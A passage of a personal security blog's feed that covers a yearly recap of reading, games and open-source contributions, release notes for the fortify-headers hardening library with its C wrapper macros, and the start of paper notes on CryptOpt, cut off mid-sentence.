<li><a href="https://en.wikipedia.org/wiki/The_Killer_(comics)">Le tueur</a></li>
<li>Some <a href="https://en.wikipedia.org/wiki/Warhammer_40,000">Warhammer 40,000</a>:<ul>
<li><a href="https://wh40k.lexicanum.com/wiki/Sons_of_the_Hydra_(Novel)">Sons of the Hydra</a>, neat.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Anthology)">Dark Imperium (Anthology)</a></li>
<li><a href="https://wh40k.lexicanum.com/wiki/Shroud_of_Night_(Novel)">Shroud of Night</a>, forgettable.</li>
<li>The <a href="https://wh40k.lexicanum.com/wiki/Black_Legion_(Novel_Series)">Black Legion</a> duology, solid.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Renegades:_Harrowmaster_(Novel)">Renegades: Harrowmaster</a>, witty.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Kingmaker_(Novel)">Assassinorum: Kingmaker</a>, decent.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Night_Lords_(Novel_Series)">Night Lords: The Omnibus</a>, outstanding.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Deacon_of_Wounds_(Novel)">The Deacon of Wounds</a> great writing style.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Execution_Force_(Novel)">Assassinorum: Execution force</a>, forgettable.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Infinite_and_the_Divine_(Novel)">The Infinite and the Divine</a>, highly entertaining.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_I_(Novel)">The End and the Death vol. 1</a>, a <em>teensy</em> bit over the top.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_II_(Novel)">The End and the Death vol. 2</a>, almost there, almost there, ...</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Macharian_Crusade_(Novel_Series)">The Macharian Crusade Omnibus</a>, a writing style a tad heavy.</li>
<li>The <a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Novel_Series)">Dark Imperium</a> trilogy, nice to see the setting moving forward!</li>
<li>The first 5 tomes of the <a href="https://wh40k.lexicanum.com/wiki/Dawn_of_Fire_(Novel_Series)">Dawn of Fire</a> heptalogy, definitely a series of books.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Lion:_Son_of_the_Forest_(Novel)">The Lion: Son of the Forest</a>, I've seen Dragon Ball episodes with a quicker pace.</li>
<li>Finished the <a href="https://wh40k.lexicanum.com/wiki/The_Beast_Arises_(Novel_Series)">Beast Arises</a>
dodecalogy. The last chapter of the final book deserved a book on its own,
instead of being speedrun in ~30 pages.</li>
</ul>
</li>
<li><a href="https://en.wikipedia.org/wiki/It%27s_OK_to_Be_Angry_About_Capitalism">It's OK to Be Angry About Capitalism</a></li>
<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</a>: a <a href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html">reference</a></li>
<li><a href="https://direct.mit.edu/books/book/3008/Beyond-ChoicesThe-Design-of-Ethical-Gameplay">Beyond choices: The design of ethical gameplay</a></li>
<li><a href="https://editions-ixe.fr/catalogue/non-le-masculin-ne-lemporte-pas-sur-le-feminin-ned/">Non, le masculin ne l’emporte pas sur le féminin !</a></li>
<li><a href="https://en.wikipedia.org/wiki/This_Changes_Everything_(book)">This Changes Everything: Capitalism vs. the Climate</a></li>
<li><a href="https://www.goodreads.com/en/book/show/51176626">Break 'em Up: Recovering Our Freedom from Big Ag, Big Tech, and Big Money</a>.</li>
<li><a href="https://aosabook.org/en/buy.html">The Performance of Open Source Applications</a>: contains some really nice tidbits.</li>
<li><a href="https://aosabook.org/en/">The Architecture of Open Source Applications, Part 1.</a>: computers were a mistake.</li>
<li><a href="https://nostarch.com/kill-it-fire">Kill It with Fire: Manage Aging Computer Systems (and Future Proof Modern Ones)</a></li>
<li><a href="https://goodreads.com/book/show/38212110-technically-wrong">Technically Wrong: Sexist Apps, Biased Algorithms, and Other Threats of Toxic Tech</a></li>
<li><a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</a>: <a href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html">great</a></li>
<li><a href="https://freakyclown.com/publications">How I Rob Banks (and other such places)</a>, written in an unbearably cocky style, mildly entertaining.</li>
<li><a href="https://samleecole.com">How Sex Changed the Internet and the Internet Changed Sex: An Unexpected History</a>, a bit too shallow for my taste.</li>
<li><a href="https://toddrose.com/endofaverage">The End of Average</a>, great book, except the part where the author argues that the goal of schools is to prepare kids for jobs.</li>
<li><a href="https://staffeng.com/book">Staff Engineer: Leadership beyond the management track</a>, I'm not there yet, but it helped me understand some coworkers' jobs and struggles.</li>
<li><a href="https://thirdeditions.com/en/sagas/94-metal-gear-solid-hideo-kojima-s-magnum-opus-9791094723616.html">Metal Gear Solid. Hideo Kojima's Magnum Opus</a>:
deluge of superlatives directed at Kojima, speculative opinionated wild rambling, no mention of the <a href="https://en.wikipedia.org/wiki/Quiet_(Metal_Gear)">rampant</a>
<a href="https://theguardian.com/technology/2014/apr/09/metal-gear-solid-ground-zeroes-sexual-violence">sexism</a>,
typos and frenchisms, … prefer the <a href="https://en.wikipedia.org/wiki/Metal_Gear">wikipedia</a> and <a href="https://metalgear.fandom.com/wiki/Metal_Gear_Wiki">fandom</a> pages instead.</li>
<li><a href="https://en.wikipedia.org/wiki/The_Mirage_(Ruff_novel)">The Mirage</a>: I
was expecting more of a description of an alternative history than a
novel with a lame plot and forgettable characters. The humour is goofy
and unsubtle: a punk rock group called Green Desert has an anti-war
anthem named "Arabian Idiot"; a morning talk show called Jazeera &amp;
Friends, … but this is completely on par with the post-11-September
anti-muslim/Iraqi rhetoric, making it both funny and perfectly adequate.</li>
</ul>
</li>
<li>Moved back to France.</li>
<li>Volunteered at a library.</li>
<li>Refused to sell <a href="https://websec.fr">websec.fr</a></li>
<li>Listened to <a href="https://listenbrainz.org/user/jvoisin/year-in-music/">some music</a>.</li>
<li>Attended some concerts:<ul>
<li><a href="https://en.wikipedia.org/wiki/Eisbrecher">Eisbrecher</a>, along with <a href="https://maerzfeld.de">Maerzfeld</a></li>
<li><a href="https://gojira-music.com">Gojira</a>, along with <a href="https://alienweaponry.com">Alien Weaponry</a></li>
<li><a href="https://katatonia.com">Katatonia</a>, along with
<a href="https://som.band">SOM</a> and <a href="https://solstafir.net">Sólstafir</a></li>
<li><a href="https://heavenshallburn.com">Heaven Shall Burn</a>, along with
<a href="https://trivium.org">Trivium</a>,
<a href="https://en.wikipedia.org/wiki/Malevolence_(band)">Malevolence</a>, and
<a href="https://obituary.cc">Obituary</a></li>
<li><a href="https://igorrr.com">Igorrr</a>, along with
<a href="https://derwegeinerfreiheit.de">Der Weg einer Freiheit</a>,
<a href="https://en.wikipedia.org/wiki/Amenra">Amenra</a>, and
<a href="http://hangmanschair.com">Hangman's Chair</a></li>
</ul>
</li>
<li>Played some video games:<ul>
<li>On a computer:<ul>
<li><a href="https://www.doomworld.com/forum/topic/134292-myhousewad/">MyHouse.WAD</a>: <a href="https://doomwiki.org/wiki/My_House">wow</a>.</li>
<li><a href="https://en.wikipedia.org/wiki/Observer_(video_game)">&gt;observer_</a>: didn't like it.</li>
<li><a href="https://en.wikipedia.org/wiki/Sea_of_Thieves">Sea of Thieves</a>, ~ok with friends.</li>
<li><a href="https://hyperstrange.com/our-games/blood-west/">Blood West</a>: <a href="https://en.wikipedia.org/wiki/Thief_(series)">Thief</a> in the Far West.</li>
<li><a href="https://en.wikipedia.org/wiki/Half-Life%3A_Alyx">Half Life: Alyx</a>: impressive in every way.</li>
<li><a href="https://en.wikipedia.org/wiki/High_on_Life_(video_game)">High on Life</a>: excruciatingly tedious at best.</li>
<li><a href="https://en.wikipedia.org/wiki/Cyberpunk_2077#Cyberpunk_2077:_Phantom_Liberty">Cyberpunk 2077: Phantom Liberty</a>: glorious.</li>
<li><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six: Siege</a>: better than <a href="https://en.wikipedia.org/wiki/Counter-Strike">Counter Strike</a>.</li>
<li><a href="https://en.wikipedia.org/wiki/Hogwarts_Legacy">Hogwarts Legacy</a>: breathtaking and well rounded.</li>
<li><a href="https://store.steampowered.com/app/2329130/Rewind_Or_Die/">Rewind or Die</a> felt like playing Resident Evil again &lt;3</li>
<li><a href="https://en.wikipedia.org/wiki/Outer_Wilds">Outer Wilds</a>: the controls were too terrible for me to play.</li>
<li><a href="https://en.wikipedia.org/wiki/The_Last_of_Us_Part_I">The Last of Us Part 1</a>: ok-ish, not my jam, Joel is a moron.</li>
<li><a href="https://en.wikipedia.org/wiki/The_Witcher_3%3A_Wild_Hunt">The Witcher 3 - Wild Hunt</a>: when did video games get so long…</li>
<li><a href="https://en.wikipedia.org/wiki/Apex_Legends">Apex Legends</a>: a lame version of <a href="https://en.wikipedia.org/wiki/Titanfall_2">Titanfall 2</a>, ok-ish when playing ranked.</li>
<li><a href="https://en.wikipedia.org/wiki/Warhammer_40,000:_Chaos_Gate_-_Daemonhunters">Warhammer 40,000: Chaos Gate - Daemonhunters</a>:
<a href="https://en.wikipedia.org/wiki/XCOM">XCOM</a> with <a href="https://wh40k.lexicanum.com/wiki/Grey_Knights">Grey knights</a>.</li>
<li><a href="https://en.wikipedia.org/wiki/Metal%3A_Hellsinger">Metal: Hellsinger</a>: looked super-lame on gameplay videos, but was surprisingly fun.</li>
<li><a href="https://en.wikipedia.org/wiki/Starfield_(video_game)">Starfield</a>: a buggy clunky quickly-boring
<a href="https://en.wikipedia.org/wiki/The_Elder_Scrolls_V:_Skyrim">Skyrim</a> in space, quickly went back to Cyberpunk 2077.</li>
<li><a href="https://store.steampowered.com/app/1172650/INDUSTRIA/">Industria</a>: catastrophic performance for something that looks utterly terrible, along with a clunky feeling, promptly uninstalled.</li>
<li><a href="https://en.wikipedia.org/wiki/Journey_to_the_Savage_Planet">Journey to the Savage Planet</a>: Rich in poop-oriented
jokes, trying hard to be funny and maybe even subversive but systematically falling flat.</li>
<li><a href="https://en.wikipedia.org/wiki/Baldur%27s_Gate_3">Baldur's Gate 3</a>: not a
fan of the <a href="https://en.wikipedia.org/wiki/Dungeons_%26_Dragons">Dungeons &amp; Dragons</a> dice-based
gameplay, nor of the hard dialog choices cutting entire parts of the game,
but still an amazing game.</li>
<li><a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Definitive Experience</a>,
so <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_Ground_Zeroes">Metal Gear Solid V: Ground Zeroes</a> and
<a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Phantom Pain</a>.
I bought it after having seen the former being run at the <a href="https://gamesdonequick.com/tracker/run/5506">AGDQ 2023</a>.
Truly amazing game overall, except for the <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain#Portrayal_of_Quiet">sexualisation of the <em>sole</em> female character</a>.</li>
</ul>
</li>
<li>On a (glorious) <a href="https://en.wikipedia.org/wiki/Steam_Deck">Steam Deck</a>:<ul>
<li><a href="https://store.steampowered.com/app/638990/UNDYING/">UNDYING</a>: nice
zombie-related game.</li>
<li><a href="https://store.steampowered.com/agecheck/app/1593500/">God of War</a>,
surprisingly "wholesome".</li>
<li><a href="https://blacksaltgames.com/">Dredge</a>, terrific indie game: gorgeous looking, simple yet gripping gameplay, interesting lore and story, …</li>
<li><a href="https://en.wikipedia.org/wiki/Vampyr_(video_game)">Vampyr</a>, because
I miss <a href="https://en.wikipedia.org/wiki/Vampire:_The_Masquerade_%E2%80%93_Bloodlines">Vampire: The Masquerade – Bloodlines</a>. It could have been so much more instead of being "meh".</li>
</ul>
</li>
</ul>
</li>
<li>Ported <a href="https://github.com/jvoisin/snuffleupagus">Snuffleupagus</a> to PHP8.3.</li>
<li>Contributed to a couple of software projects:<ul>
<li><a href="https://github.com/lite-xl/lite-xl/pulls?q=is%3Apr+author%3Ajvoisin">lite-xl</a></li>
<li><a href="https://alpinelinux.org/">Alpine linux</a>, by:<ul>
<li>becoming a <a href="https://pkgs.alpinelinux.org/packages?branch=edge&amp;repo=&amp;arch=&amp;maintainer=Julien%20Voisin">package maintainer</a></li>
<li><a href="https://gitlab.alpinelinux.org/alpine/tsc/-/issues/64">documenting a bit</a> the compiler-based mitigations,
and <a href="https://gitlab.alpinelinux.org/alpine/abuild/-/merge_requests/221">enabling some missing ones</a>.</li>
</ul>
</li>
<li>Because of <a href="https://runzero.com">runZero</a>, I<ul>
<li><a href="https://github.com/rapid7/recog/pulls?q=+is%3Apr+author%3Ajvoisin">contributed to recog</a> to improve some of its fingerprints;</li>
<li><a href="https://github.com/Sonarr/Sonarr/issues/5601">made it less trivial</a> to detect Sonarr/Lidarr/Radarr/… versions.</li>
</ul>
</li>
<li><a href="https://github.com/struct/isoalloc/pulls?q=is%3Apr+author%3Ajvoisin+created%3A2023">isoalloc</a></li>
<li><a href="https://github.com/pygments/pygments/commits?author=jvoisin">pygments</a>, mainly by adding lexers.</li>
<li><a href="https://github.com/morpheus65535/bazarr/pull/2304">Bazarr</a>, making it work on Alpine Linux.</li>
<li><a href="https://github.com/google/oss-fuzz/pulls?q=is%3Apr+author%3Ajvoisin">oss-fuzz</a>,
including some <a href="https://github.com/guidovranken/python-library-fuzzers/pulls?q=is%3Apr+author%3Ajvoisin">python fuzzers</a>.</li>
<li><a href="https://github.com/daanx/mimalloc-bench">mimalloc-bench</a>,
resulting in some <a href="https://github.com/microsoft/snmalloc/pull/587#issuecomment-1442077886">real world improvements</a>.</li>
<li><a href="https://github.com/quodlibet/mutagen/pulls/jvoisin">mutagen</a>, since it's
used by <a href="https://0xacab.org/jvoisin/mat2">mat2</a>. I even <a href="https://github.com/google/oss-fuzz/pull/10072">integrated it into
OSS-Fuzz</a>.</li>
<li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is%3Apr+jvoisin">metasploit</a>,
by doing a lot of code reviews for pull-requests, and landing some modules,
like a <a href="https://github.com/rapid7/metasploit-framework/pull/17711">SPIP RCE</a>,
courtesy of <a href="https://thinkloveshare.com/">Laluka</a> and <a href="https://twitter.com/coiffeur0x90">coiffeur</a>.</li>
<li><a href="https://chrony.tuxfamily.org/">chrony</a>, spending some time debugging
<a href="https://mail-archive.com/chrony-dev@chrony.tuxfamily.org/msg02572.html">how to enable its seccomp sandbox</a>
on Alpine Linux, resulting in a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/issues/14891#note_316587">couple of improvements</a>,
and of course a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/47087">now-enabled-by-default sandbox</a> there.</li>
</ul>
</li>
<li>Got a CVE for a bug I <a href="https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw">reported</a> in 2020!</li>
<li>Kept maintaining <a href="https://openmw.org">OpenMW</a>'s infrastructure.</li>
<li>Learnt some <a href="https://en.wikipedia.org/wiki/Rust_(programming_language)">Rust</a> so I could hang out with the cool kids.</li>
<li>Helped organise the <a href="http://g.co/ctf">GoogleCTF</a>, which was <a href="https://ctftime.org/event/1929">pretty well received</a>.</li>
<li>Added more possible subtitles to this blog, bringing their numbers above 1100.</li>
<li>Reduced the size of this website's webpages; most should now be around 10kb.</li>
<li>Contributed a bit to Wikipedia, in <a href="https://en.wikipedia.org/wiki/Special:Contributions/jvoisin">English</a> and in <a href="https://fr.wikipedia.org/wiki/Sp%C3%A9cial:Contributions/jvoisin">French</a>
under my usual nickname.</li>
<li>Moved my emails away from <a href="https://gandi.net">Gandi</a> over to <a href="https://migadu.com">Migadu</a>,
given their <a href="https://chatting.neocities.org/posts/2023-gandi-pricing">ludicrous</a> post-acquisition price increase.</li>
<li><a href="https://github.com/jvoisin/compiler-flags-distro">Investigated</a> what
hardening-related compiler flags were enabled by default by popular Linux
distributions.</li>
<li><a href="https://tests.stockfishchess.org/users#jvoisin">Contributed a bit</a> (by crunching numbers) to <a href="https://stockfishchess.org/">Stockfish</a>,
an open-source chess engine with an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo rating</a>
around <a href="https://computerchess.org.uk/ccrl/4040/rating_list_all.html">3500</a>.</li>
<li>Got featured a couple of times on the Hacker News/reddit/lobste.rs/… front page,
thanks to a <s><a href="https://www.reddit.com/r/karma/wiki/index/faq/">karma</a> junkie</s>
marketing-able <a href="https://dijit.sh">friend</a>.</li>
<li>Kept maintaining <a href="https://nos-oignons.net/">Nos Oignons</a>'s infrastructure with <a href="https://corl3ss.com/">corl3ss</a>.
We're back at handling <a href="https://nos-oignons.net/Services/index.en.html">around 2%</a>
of tor's exit traffic! Our little non-profit is now 10 years old.</li>
<li><a href="https://github.com/jvoisin/fortify-headers">Took over</a> the development and maintenance of
<a href="https://u.2f30.org/sin/">sin</a>'s <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>.
It's used by <a href="https://openwrt.org/">OpenWrt</a>, <a href="https://www.alpinelinux.org/">Alpine Linux</a>,
and <a href="https://bugs.gentoo.org/546692">soon</a> in <a href="https://wiki.gentoo.org/wiki/Project:Musl">Gentoo Hardened's musl flavour</a>.</li>
<li>Ported my resume/cover letter template from
<a href="https://latex-project.org">LaTeX</a> to
<a href="https://typst.app/docs/guides/guide-for-latex-users/">typst</a> and felt so
much joy purging away all the LaTeX/TeXLive/XeTeX/LuaTeX/… garbage from my computer,
to never have to touch it again.</li>
<li>Got a "Documented Feedback from Employee Relations" from HR at work for
saying "Awkward to have yet another middle aged rich white het guy come talk
about diversity and inclusion." on an internal chatroom, about <a href="https://booleanblackbelt.com/who-is-the-boolean-black-belt/">this middle
aged rich white het guy</a>
invited to give an internal talk about diversity and inclusion.</li>
</ul></content><category term="misc"></category></entry><entry><title>fortify-headers 2.1</title><link href="https://dustri.org/b/fortify-headers-21.html" rel="alternate"></link><published>2023-12-16T20:30:00+01:00</published><updated>2023-12-16T20:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-16:/b/fortify-headers-21.html</id><content type="html"><p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
fixing a couple of portability issues and tidying up the code a bit.
<a href="https://chimera-linux.org/">Chimera Linux</a> users are
<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
<del>test driving</del> benefiting from it.</p>
<h2>Changelog</h2>
<ul>
<li>Remove superfluous includes from the headers</li>
<li>Put some functions into their proper files</li>
<li>Add a missing include in <code>sys/select.h</code></li>
<li>Do not use <code>static inline</code> for C++ to avoid <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">ODR</a> violations</li>
<li>Guard some conditional stdio APIs with the right macros</li>
<li>Fix a typo that would prevent C++ code from compiling correctly</li>
<li>Rename macros to be more namespace-friendly</li>
</ul>
<h2>Implementation details</h2>
<p>Including parts from the
<a href="https://en.wikipedia.org/wiki/Standard_library">stdlib</a> in fortify means that
programs that don't correctly include everything they need might compile, even
though they shouldn't. Fortunately, the only bits used are either:</p>
<ul>
<li><code>size_t</code>, which can be obtained by using <code>typeof(sizeof(char))</code>,
since it's by definition the type returned by <code>sizeof</code>.</li>
<li>constants like <code>PATH_MAX</code> (that we can define to <code>4096</code>), <code>MB_LEN_MAX</code>
(defined as 16), ...</li>
<li>eldritch constructs like <a href="https://www.man7.org/linux/man-pages/man3/MB_CUR_MAX.3.html"><code>MB_CUR_MAX</code></a>,
whose usage we hide behind an <code>#ifdef</code>.</li>
</ul>
<p>The other big thing is the one caught by <a href="https://github.com/ssbr">Devin Jeanpierre</a>: the usage of <code>static
inline</code>, while <a href="https://en.cppreference.com/w/c/language/inline">absolutely alright in C</a>,
is problematic in C++, because of the <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">One Definition Rule</a>:
in C++, if a function is declared inline, it must be declared inline in every translation unit, and every
definition of an inline function must be exactly the same (while in C they may
differ). On the other hand, C++ allows non-const function-local
statics, and all function-local statics from different definitions of an inline
function are the same in C++, but distinct in C.
More practically, calling <code>FORTIFY_INLINE</code> functions from an inline function in C++, and including
the header defining that inline function in more than one <a href="https://en.wikipedia.org/wiki/Translation_unit_%28programming%29">translation
unit</a> results
in undefined behaviour. The fix is easy, and was
<a href="https://github.com/jvoisin/fortify-headers/commit/c607773a80e6685ab4c922245c33cf2ea5dcfb72">committed</a>
by <a href="https://github.com/q66">q66</a>: use <code>static</code> instead of <code>static inline</code> in C++.</p>
<p>Thanks to <a href="https://github.com/ssbr">Devin Jeanpierre</a> for spending time looking at
C++ compatibility, and to <a href="https://github.com/q66">q66</a> for his patches, his willingness to ship
fortify-headers in Chimera, and for becoming co-maintainer.</p></content><category term="security"></category></entry><entry><title>fortify-headers 2.0</title><link href="https://dustri.org/b/fortify-headers-20.html" rel="alternate"></link><published>2023-12-12T23:30:00+01:00</published><updated>2023-12-12T23:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-12:/b/fortify-headers-20.html</id><summary type="html"><p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
interested in my changes, and he told me the …</p></summary><content type="html"><p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
interested in my changes, and he told me the project wasn't maintained
anymore. But he would be happy to give me the commit bit instead. I spent
some months <a href="https://github.com/jvoisin/fortify-headers">writing code</a> before
accepting, to see if it would be a good idea: Would I be able to maintain it?
To improve it? Add more features? and so on. Turns out the answer is yes, and
I'm thus happy to announce the immediate availability of <a href="https://git.2f30.org/fortify-headers/refs.html">fortify-headers
2.0</a>!</p>
<h2>Changelog</h2>
<ul>
<li>Added clang support, based on <a href="https://github.com/q66">q66</a>'s patches.</li>
<li>Fixed a 64b-related incompatibility around <code>ppoll</code> </li>
<li>Added a ton of tests, with <a href="https://jvoisin.github.io/fortify-headers/">around 90% of coverage</a></li>
<li>Made use of <code>__builtin_dynamic_object_size</code> when <code>FORTIFY_SOURCE=3</code> is used,
instead of <code>__builtin_object_size</code>.</li>
<li>Made use of <a href="https://clang.llvm.org/docs/AttributeReference.html">attributes</a>:
<a href="https://clang.llvm.org/docs/AttributeReference.html#alloc-size">alloc_size</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-as-builtin">diagnose_as_builtin</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-if">diagnose_if</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#format">format</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#malloc">malloc</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#nodiscard-warn-unused-result">warn_unused_result</a>,
…</li>
<li>Added some missing functions, like <code>calloc</code>, <code>fdopen</code>, <code>fmemopen</code>, <code>fprintf</code>,
<code>malloc</code>, <code>memchr</code>, <code>popen</code>, <code>printf</code>, <code>qsort</code>, <code>umask</code>, …</li>
<li>Added continuous integration, both on clang and gcc, covering the whole range
of supported versions across the latest Ubuntu LTS.</li>
</ul>
<h2>Implementation details</h2>
<p>Since this is a pretty uncommon piece of software, friends of mine have been
asking me details about the involved black magic.
While it's possible to overload functions with the
<a href="https://clang.llvm.org/docs/AttributeReference.html#overloadable">overloadable</a>
attribute in C, there isn't really anything similar for drive-by overloading.
Fortunately, it's possible to hack an equivalent by combining
<a href="https://gcc.gnu.org/onlinedocs/cpp/Wrapper-Headers.html"><code>#include_next</code></a> with
the following macros:</p>
<div class="codehilite"><pre><span></span><code><span class="cp">#define _FORTIFY_STR(s) #s</span>
<span class="cp">#define _FORTIFY_ORIG(p, fn) __typeof__(fn) __orig_##fn __asm__(_FORTIFY_STR(p) #fn)</span>
<span class="cp">#define _FORTIFY_FNB(fn) _FORTIFY_ORIG(__USER_LABEL_PREFIX__, fn)</span>
<span class="cp">#define _FORTIFY_FN(fn) _FORTIFY_FNB(fn); _FORTIFY_INLINE</span>
</code></pre></div>
<p>This makes the original function available when prefixed with <code>__orig</code>,
while allowing overloading.
On clang, the <a href="https://clang.llvm.org/docs/AttributeReference.html#pass-object-size-pass-dynamic-object-size"><code>pass_object_size</code>/<code>pass_dynamic_object_size</code></a>
attribute is used to pass down argument sizes; the assembly label prevents
weird <a href="https://en.wikipedia.org/wiki/Name_mangling">mangling</a> issues. Since
it's only a label, despite being assembly, it's still portable across various
architectures. The <code>_FORTIFY_INLINE</code> macro contains as many "please inline this
function" directives as possible, to avoid polluting the symbol table.</p>
<p>There is of course a ton of <code>#ifdef</code>/<code>#if __has_attribute</code>/… to work around various
compiler intrinsics, like clang missing <code>__builtin_va_arg_pack</code> or gcc missing
<code>diagnose_if</code>, so that fortify-headers always makes use of as many
features as are available.</p>
<p>It is indeed a particularly gross pile of hacks,
but this is C, also known as "nice things and why we can't have them."</p>
<p>Thanks to <a href="https://u.2f30.org/sin/">sin</a> for creating the project and
maintaining it for years, <a href="https://daniel.micay.dev">strcat</a> for his inspiring
work on fortifying <a href="https://en.wikipedia.org/wiki/Bionic_(software)">bionic</a>,
<a href="https://github.com/q66">q66</a> for his clang patches and general support,
the friendly people from <a href="https://2f30.org">2f30</a> for their patience,
<a href="http://serge.liyun.free.fr/serge/">Serge Sans Paille</a> for his <a href="https://github.com/serge-sans-paille/fortify-test-suite">testsuite</a>,
<a href="https://people.freebsd.org/~kevans/">kevans</a> for his work on fortifying
<a href="https://reviews.freebsd.org/D32306">FreeBSD's libc</a>,
Red Hat for pushing <code>FORTIFY_SOURCE=2</code> and <code>FORTIFY_SOURCE=3</code> forward,
...</p></content><category term="security"></category></entry><entry><title>Paper notes: CryptOpt</title><link href="https://dustri.org/b/paper-notes-cryptopt.html" rel="alternate"></link><published>2023-12-01T12:30:00+01:00</published><updated>2023-12-01T12:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-01:/b/paper-notes-cryptopt.html</id><summary type="html"><ul>
<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
</ul>
<p>Cryptography is hard, high-performance one even more so: formal …</p></summary><content type="html"><ul>
<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
</ul>
<p>Cryptography is hard, and high-performance cryptography even more so: formal proofs of
assembly implementations are horrible to model, and code generated from
formal proofs is hard to lower to high-performance assembly. The core idea of
CryptOpt is to treat this as a black box combinatorial optimization problem,
and bruteforce possible solutions in a smart way against an oracle.</p>
<p>More precisely:</p>
<ol>
<li>start from a known-correct implementation in
<a href="https://github.com/mit-plv/fiat-crypto">fiat-crypto</a> (a
coq-powered high-level to low-level IR proven translator) low-level IR;</li>
<li>lower it via a fuzzer-like machinery replacing/reordering operands,
applying semantics-and-data-constraints-preserving transformations, which has an acceptable
search space because:<ul>
<li>it's straight-line no-aliasing constant-offset-pointers assembly;</li>
<li>transformations can be templatised, e.g. <code>add ≍ clc; adcx</code>;</li>
</ul>
</li>
<li>lift the resulting x64 assembly to fiat-crypto low-level IR;</li>
<li>use a custom <a href="https://en.wikipedia.org/wiki/E-graph">e-graph</a> based
<em>equivalence checker</em> implemented as a mix between an SMT solver and a symbolic-execution engine;</li>
<li>if the new implementation is correct, benchmark it against the current
fastest one, and keep it if it outperforms it;</li>
<li><code>goto 2</code>.</li>
</ol>
<p>This approach has a couple of advantages:</p>
<ul>
<li>fuzzers are cheaper than highly specialised engineering time</li>
<li>porting implementations to new hardware is simply a matter of
running CryptOpt on it.</li>
<li>by lifting the assembly to fiat-crypto low-level IR,
there is no need to write complex formal proofs,
since fiat-crypto is already taking care of those.</li>
<li>controlling the mutations makes it possible to ensure that
the implementation stays side-channel free.</li>
</ul>
<p>The main issue though, is that one needs to formally implement
whatever algorithm to optimize in fiat-crypto, which is not that easy (and
which the authors of the paper didn't do for libsecp256k1).</p>
<p>Implementation-wise, the authors ran 200k mutations, with 20 initial candidates,
over 18 Fiat IR primitives, taking between 20 and 40 CPU hours. Interestingly,
